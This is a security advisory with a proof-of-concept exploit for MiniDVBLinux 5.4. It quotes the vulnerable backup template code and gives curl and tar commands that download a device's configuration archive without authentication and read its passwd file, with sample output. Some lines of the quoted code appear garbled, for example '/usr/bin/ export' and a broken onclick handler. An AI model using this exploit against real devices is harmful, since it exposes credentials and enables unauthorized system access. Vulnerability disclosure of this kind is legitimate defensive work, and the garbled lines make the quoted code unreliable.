MiniDVBLinux 5.4 Config Download Exploit  
Vendor: MiniDVBLinux  
Product web page:  
Affected version: <=5.4  
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple  
way to convert a standard PC into a Multi Media Centre based on the  
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this  
Linux based Digital Video Recorder: Watch TV, Timer controlled  
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration  
via browser, and a lot more. MLD strives to be as small as possible,  
modular, simple. It supports numerous hardware platforms, like classic  
desktops in 32/64bit and also various low power ARM systems.  
Desc: The application is vulnerable to unauthenticated configuration  
download when direct object reference is made to the backup function  
using an HTTP GET request. This will enable the attacker to disclose  
sensitive information and help her in authentication bypass, privilege  
escalation and full system access.  
/var/www/tpl/setup/Backup/Edit\ backup/  
01: <?  
02: if [ "$GET_action" = "getconfig" ]; then  
03: . /etc/rc.config  
04: header "Content-Type: application/x-compressed-tar"  
05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"  
06: /usr/bin/ export /tmp/backup_config_$$.tgz &>/dev/null  
07: cat /tmp/backup_config_$$.tgz  
08: rm -rf /tmp/backup_config*  
09: exit  
10: fi  
11: ?>  
12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="'/tpl/setup/Backup/Edit backup/'); call('')"/></div>  
Tested on: MiniDVBLinux 5.4  
BusyBox v1.25.1  
Architecture: armhf, armhf-rpi2  
GNU/Linux (armv7l)  
VideoDiskRecorder 2.4.6  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2022-5713  
Advisory URL:  
> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/ -o config.tgz  
> mkdir configdir  
> tar -xvzf config.tgz -C .\configdir  
> cd configdir && cd etc  
> type passwd  
ftp:!:40:2:FTP account:/:/bin/sh